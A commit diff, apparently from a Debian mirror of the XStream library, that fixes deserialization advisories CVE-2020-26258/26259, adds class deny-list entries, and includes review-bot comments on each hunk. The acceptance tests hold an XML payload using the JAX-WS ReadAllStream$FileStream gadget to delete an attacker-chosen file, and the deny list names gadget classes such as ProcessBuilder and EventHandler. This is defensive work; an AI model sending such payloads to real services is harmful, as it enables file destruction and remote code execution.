     Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine
     causing a Denial of Service.</p>
      
@@ -64,11 +65,12 @@
          
  	<p>More scenarios have been identified for types that are already delivered with the Java runtime.  Looking at 
  	well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more
- 	exploits is very high.</p>
+ 	exploits is very high.  A class like InvokerTransformer of Apache Commons Collections has a high potential for
+ 	attacks.</p>
 
-	<p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security,
-    because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class
-    types are setup explicitly. This will be the default for XStream 1.5.x.</p>
+	<p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security,
+    because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the
+    allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p>
    	
 	<p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default.  You have to
  	explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to
@@ -91,8 +93,8 @@
 	framework supports the setup of a blacklist or whitelist scenario.  Any application should use this feature to
 	limit the danger of arbitrary command execution if it deserializes data from an external source.</p>
  	
-	<p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java
-	runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no
+	<p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java
+	runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no
 	longer be used as drop-in replacement.  Unfortunately this provides a false sense of security.  Every XStream
 	client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist
 	as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer
@@ -121,7 +123,9 @@
 	<p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other
 	commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans
 	EventHandler.  To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework,
-	allowing application developers to define which types are allowed to be unmarshalled with XStream.</p>
+	allowing application developers to define which types are allowed to be unmarshalled with XStream.  Use
+	<a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
+	to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p>
          
 	<p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>.
 	The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list


=====================================
xstream-distribution/src/content/website.xml
=====================================
@@ -1,6 +1,6 @@
 <!--
  Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers.
+ Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers.
  All rights reserved.
  
  The software in this package is published under the terms of the BSD
@@ -45,6 +45,8 @@
     </section>
     <section>
         <name>Vulnerabilities</name>
+        <page>CVE-2020-26259.html</page>
+        <page>CVE-2020-26258.html</page>
         <page>CVE-2020-26217.html</page>
         <page>CVE-2017-7957.html</page>
         <page>CVE-2016-3674.html</page>


=====================================
xstream-hibernate/pom.xml
=====================================
@@ -13,7 +13,7 @@
   <parent>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream-parent</artifactId>
-    <version>1.4.14</version>
+    <version>1.4.15</version>
   </parent>
   <artifactId>xstream-hibernate</artifactId>
   <packaging>jar</packaging>


=====================================
xstream-jmh/pom.xml
=====================================
@@ -13,7 +13,7 @@
   <parent>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream-parent</artifactId>
-    <version>1.4.14</version>
+    <version>1.4.15</version>
   </parent>
   <artifactId>xstream-jmh</artifactId>
   <packaging>jar</packaging>


=====================================
xstream/pom.xml
=====================================
@@ -14,7 +14,7 @@
   <parent>
     <groupId>com.thoughtworks.xstream</groupId>
     <artifactId>xstream-parent</artifactId>
-    <version>1.4.14</version>
+    <version>1.4.15</version>
   </parent>
   <artifactId>xstream</artifactId>
   <packaging>jar</packaging>
@@ -143,6 +143,54 @@
       <artifactId>commons-lang</artifactId>
       <scope>test</scope>
     </dependency>
+
+    <dependency>
+      <groupId>com.sun.xml.ws</groupId>
+      <artifactId>jaxws-rt</artifactId>
+      <scope>test</scope>
+      <exclusions>
+        <exclusion>
+          <groupId>javax.xml.ws</groupId>
+          <artifactId>jaxws-api</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.istack</groupId>
+          <artifactId>istack-commons-runtime</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.xml.bind</groupId>
+          <artifactId>jaxb-impl</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.xml.messaging.saaj</groupId>
+          <artifactId>saaj-impl</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.xml.stream.buffer</groupId>
+          <artifactId>streambuffer</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.xml.ws</groupId>
+          <artifactId>policy</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>com.sun.org.apache.xml.internal</groupId>
+          <artifactId>resolver</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>org.glassfish.gmbal</groupId>
+          <artifactId>gmbal-api-only</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>org.jvnet</groupId>
+          <artifactId>mimepull</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>org.jvnet.staxex</groupId>
+          <artifactId>stax-ex</artifactId>
+        </exclusion>
+      </exclusions>
+    </dependency>
   </dependencies>
 
   <build>
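Review bot: The new `jaxws-rt` test dependency and its ten exclusions carry no comment, so a later maintainer cannot tell why a web-services runtime sits on the test classpath or which exclusions are safe to drop. Judging by the SecurityVulnerabilityTest hunk in this commit, it is there only to supply `com.sun.xml.ws.util.ReadAllStream`. I would add above the `<dependency>` something like `<!-- test only: provides com.sun.xml.ws.util.ReadAllStream for SecurityVulnerabilityTest; transitive runtime excluded on purpose -->`. No `<version>` is given here, so it is presumably managed in the parent pom.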


=====================================
xstream/src/java/com/thoughtworks/xstream/XStream.java
=====================================
@@ -337,6 +337,7 @@ public class XStream {
     private static final Pattern IGNORE_ALL = Pattern.compile(".*");
     private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
     private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
+    private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream");
 
     /**
      * Constructs a default XStream.
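Review bot: `JAXWS_FILE_STREAM` is added without a comment saying why the type is denied, and its name explains less than `JAVAX_CRYPTO` does. The leading `.*\\.` makes the pattern match a `ReadAllStream$FileStream` in any package, which looks deliberate (presumably to cover repackaged copies) and is worth stating. I would add above it `// JAX-WS temp-file stream: the XML chooses the file, which is gone after the stream is read and closed (see SecurityVulnerabilityTest)`. The class body continues outside the hunk.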
@@ -642,8 +643,12 @@ public class XStream {
         }
 
         addPermission(AnyTypePermission.ANY);
-        denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"});
-        denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO});
+        denyTypes(new String[]{
+            "java.beans.EventHandler", //
+            "java.lang.ProcessBuilder", //
+            "javax.imageio.ImageIO$ContainsFilter", //
+            "jdk.nashorn.internal.objects.NativeString" });
+        denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM});
         allowTypeHierarchy(Exception.class);
         securityInitialized = false;
     }
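Review bot: The new deny entry `"jdk.nashorn.internal.objects.NativeString"` has no matching test in this commit's SecurityVulnerabilityTest hunk, which only exercises `ReadAllStream$FileStream`; a `testCannot…` case expecting `ForbiddenClassException` for that type would pin it. The empty `//` markers could become real comments naming the advisory each entry answers (the release notes cite CVE-2020-26258 and CVE-2020-26259). These entries are defaults only: the test hunk shows `addPermission(AnyTypePermission.ANY)` clearing them, so callers still need their own allowlist. The enclosing method starts outside the hunk.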


=====================================
xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
=====================================
@@ -1,6 +1,6 @@
 /*
  * Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -279,7 +279,7 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
         final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF);
         XML_NAME_CHARS_4TH.set('-');
         XML_NAME_CHARS_4TH.set('.');
-        XML_NAME_CHARS_4TH.set('0', '9');
+        XML_NAME_CHARS_4TH.set('0', '9' + 1);
         XML_NAME_CHARS_4TH.set(0xB7);
 
         final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone();
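Review bot: The `+ 1` fixes here and in the next hunk (`0x36F + 1`, `0x2040 + 1`) depend on `BitSet.set(from, to)` treating `to` as exclusive, but nothing in the code says so, which is how the off-by-one got in. A one-line comment at the top of the initializer, e.g. `// BitSet.set(from, to) excludes 'to', hence "+ 1" on every inclusive XML range`, would stop it recurring. The XmlFriendlyTest hunk covers only the digit range; the `0x300`–`0x36F` and `0x203F`–`0x2040` ranges stay untested. The initializer starts and ends outside the hunk, so other `set(from, to)` calls there may deserve the same check.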
@@ -406,8 +406,8 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
         XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1);
 
         XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH);
-        XML_NAME_CHARS_5TH.set(0x300, 0x36F);
-        XML_NAME_CHARS_5TH.set(0x203F, 0x2040);
+        XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1);
+        XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1);
 
         XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone();
         XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH);
@@ -493,9 +493,9 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
             // First, fast (common) case: nothing to escape
             int i = 0;
 
-            for (; i < length; i++ ) {
-                char c = name.charAt(i);
-                if (c == '$' || c == '_' || c <= 27 || c >= 127) {
+            for (; i < length; i++) {
+                final char c = name.charAt(i);
+                if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') {
                     break;
                 }
             }
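Review bot: The last clause of the new fast-path test reads `c > 'Z'`, which makes the whole condition equivalent to `c < 'A' || c > 'Z'`, so any lower-case letter leaves the fast path and only all-upper-case names are accepted by it. It looks like a typo for `'z'`: `if (c < 'A' || (c > 'Z' && c < 'a') || c > 'z') {`. The slow path is outside the hunk; if it passes plain letters through unchanged, the output stays correct and this is presumably a performance regression, not an encoding bug. A test with a lower-case-only name would not catch it, so the intent is worth stating in a comment on the loop.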


=====================================
xstream/src/java/com/thoughtworks/xstream/mapper/DefaultMapper.java
=====================================
@@ -1,6 +1,6 @@
 /*
  * Copyright (C) 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -77,7 +77,9 @@ public class DefaultMapper implements Mapper {
                 initialize = elementName.charAt(0) == '[';
             }
             return Class.forName(elementName, initialize, classLoader);
-        } catch (ClassNotFoundException e) {
+        } catch (final ClassNotFoundException e) {
+            throw new CannotResolveClassException(elementName);
+        } catch (final IllegalArgumentException e) {
             throw new CannotResolveClassException(elementName);
         }
     }
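Review bot: Both catch blocks throw `CannotResolveClassException(elementName)` and drop `e`, so a name rejected with `IllegalArgumentException` becomes indistinguishable from a missing class when someone triages a failed unmarshal. If the exception type has a cause-taking constructor in this branch, pass it on: `throw new CannotResolveClassException(elementName, e);`. A short comment on the new catch saying which call raises `IllegalArgumentException` would help too, since `elementName` comes from the XML being read. The method starts outside the hunk.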


=====================================
xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
=====================================
@@ -11,6 +11,11 @@
 package com.thoughtworks.acceptance;
 
 import java.beans.EventHandler;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
 import java.util.Iterator;
 
 import com.thoughtworks.xstream.XStream;
@@ -213,4 +218,68 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
             // OK
         }
     }
+
+    public void testCannotUseJaxwsInputStreamToDeleteFile() {
+        if (JVM.isVersion(5)) {
+            final String xml = ""
+                + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
+                + " <tempFile>target/junit/test.txt</tempFile>\n"
+                + "</is>";
+
+            xstream.aliasType("is", InputStream.class);
+            try {
+                xstream.fromXML(xml);
+                fail("Thrown " + ConversionException.class.getName() + " expected");
+            } catch (final ForbiddenClassException e) {
+                // OK
+            }
+        }
+    }
+
+    public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException {
+        if (JVM.isVersion(5)) {
+            final File testDir = new File("target/junit");
+            final File testFile = new File(testDir, "test.txt");
+            try {
+                testDir.mkdirs();
+
+                final OutputStream out = new FileOutputStream(testFile);
+                out.write("JUnit".getBytes());
+                out.flush();
+                out.close();
+
+                assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists());
+
+                final String xml = ""
+                    + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
+                    + " <tempFile>target/junit/test.txt</tempFile>\n"
+                    + "</is>";
+
+                xstream.addPermission(AnyTypePermission.ANY); // clear out defaults
+                xstream.aliasType("is", InputStream.class);
+
+                InputStream is = null;
+                try {
+                    is = (InputStream)xstream.fromXML(xml);
+                } catch (final ForbiddenClassException e) {
+                    // OK
+                }
+
+                assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists());
+
+                byte[] data = new byte[10];
+                is.read(data);
+                is.close();
+
+                assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists());
+            } finally {
+                if (testFile.exists()) {
+                    testFile.delete();
+                }
+                if (testDir.exists()) {
+                    testDir.delete();
+                }
+            }
+        }
+    }
 }
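Review bot: In `testExplicitlyUseJaxwsInputStreamToDeleteFile` the `catch (final ForbiddenClassException e) { // OK }` is not OK. The test has just allowed every type, and if the exception is thrown `is` stays null, so the later `is.read(data)` fails with a NullPointerException that hides the cause; drop the try/catch or make the catch `fail("Unexpected " + e);`. In `testCannotUseJaxwsInputStreamToDeleteFile` the fail message names `ConversionException` while the catch expects `ForbiddenClassException`; use `ForbiddenClassException.class.getName()`. Both tests are wrapped in `if (JVM.isVersion(5))` and pass silently when it is false, so the deny rule can go unverified on some builds.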


=====================================
xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
=====================================
@@ -187,6 +187,11 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest {
         assertBothWays("\"", "<string>"</string>");
     }
 
+    public void testsDigitsOnly() {
+        xstream.alias("0123456789", String.class);
+        assertBothWays("", "<_.0030123456789></_.0030123456789>");
+    }
+
     public void testDecimalFormatSymbols() {
         final String xml;
         if (!JVM.is14()) {
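Review bot: `testsDigitsOnly` has a stray `s`; it still starts with `test`, but `testDigitsOnly` would match the neighbouring `testDecimalFormatSymbols`. The expected element name deserves a one-line comment, e.g. `// a leading digit is escaped as _.0030, the remaining digits pass through unchanged`, because `_.0030123456789` is hard to read as escape plus payload.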



View it on GitLab: https://salsa.debian.org/java-team/libxstream-java/-/commit/aaea7658d3df10918725a84cfd251b53ea9e0943
